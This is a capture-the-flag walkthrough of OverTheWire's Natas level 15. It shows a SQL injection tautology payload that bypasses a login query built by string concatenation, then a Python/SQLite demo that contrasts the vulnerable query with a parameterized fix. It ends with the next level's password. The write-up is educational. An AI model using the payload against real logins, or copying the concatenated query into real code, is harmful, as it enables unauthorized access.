NatasOverTheWire

Natas15

Website URL: http://overthewire.org/wargames/natas/natas15.html

According to the OverTheWire page:

Username: natas15
URL:      http://natas15.natas.labs.overthewire.org

Let’s log in at the URL above.

Fig. 1

Looking at the source code:

Fig. 2

So we have stepped into the domain of SQL now. Well, bring it on!

Here, we can see that the username and password values supplied by the user are concatenated directly into the SELECT query sent to the database. That’s a big mistake!

The intended purpose was to compare the supplied username and password against the ones stored in the database. The flaw is that the user controls part of the SQL text itself: after closing the password string, an attacker can append a tautology (a condition that is always true), so the query matches rows regardless of the real password and the server responds as if the login succeeded.

Let’s test it out. We will supply a username (one guaranteed to exist is “natas15”). The password can be anything, but after it we’ll add a tautology, a condition that always evaluates to true.

Username: natas15
Password: natas15" or "1" = "1

To explain the distribution of the quotation marks, let’s plug the input directly into the SELECT statement to see what query will be executed:

SELECT * from users where username="natas15" and password="natas15" or "1"="1"

As you can see, the double quote in the payload closes the password string early, and everything after it is parsed as SQL. Because AND binds more tightly than OR, the condition is evaluated as (username="natas15" and password="natas15") or "1"="1", which is true for every row in the table, so the query returns results no matter what the real password is (in fact, no matter what username we supplied either). Note that the quote character in the payload must match the delimiter the query uses; this level uses double quotes, so the payload does too. Let’s execute it.

Fig. 3
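To see the same effect offline, here is an added example (not code from the level or from OverTheWire) that rebuilds the vulnerable login against an in-memory SQLite table and puts the parameterized fix next to it. The `users` rows are constructed, not the level’s real data, and the query uses single-quoted literals rather than the level’s double quotes, because SQLite treats double-quoted strings as identifiers; the payload is adapted accordingly.

```python
import sqlite3

# Constructed stand-in for the level's `users` table. The real rows are not
# shown on the page, so these usernames/passwords are made up.
USERS = [
    ("natas14", "made-up-password-14"),
    ("natas15", "made-up-password-15"),
]


def make_db():
    """Create an in-memory database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_query(username, password):
    """Mirror the level's mistake: paste user input straight into the SQL text.

    Single quotes are used as the string delimiter here (SQLite), so an
    attacker's payload must use single quotes; on the real level, which
    delimits strings with double quotes, the payload uses double quotes.
    """
    return (
        "SELECT * FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )


def vulnerable_login(conn, username, password):
    """Return how many rows the concatenated query matches.

    A correct login matches 1 row, a wrong password 0 rows, and the
    tautology payload matches every row because the WHERE clause becomes
    (username=... AND password=...) OR '1'='1'.
    """
    rows = conn.execute(build_vulnerable_query(username, password)).fetchall()
    return len(rows)


def safe_login(conn, username, password):
    """Same check with a parameterized query: input never becomes SQL text."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows)


if __name__ == "__main__":
    conn = make_db()
    payload = "natas15' or '1'='1"
    print(build_vulnerable_query("natas15", payload))
    print("vulnerable, correct password :", vulnerable_login(conn, "natas15", "made-up-password-15"))
    print("vulnerable, wrong password   :", vulnerable_login(conn, "natas15", "wrong"))
    print("vulnerable, tautology payload:", vulnerable_login(conn, "natas15", payload))
    print("vulnerable, unknown user     :", vulnerable_login(conn, "nobody", payload))
    print("safe, tautology payload      :", safe_login(conn, "natas15", payload))
```

Running it shows the tautology payload matching both constructed rows for the vulnerable query (even with a username that does not exist), while the parameterized version matches none: the placeholder binds the whole payload as a literal password value, so the quote never escapes the string.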


Never believe the user will behave as you want them to!

Password for next level: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
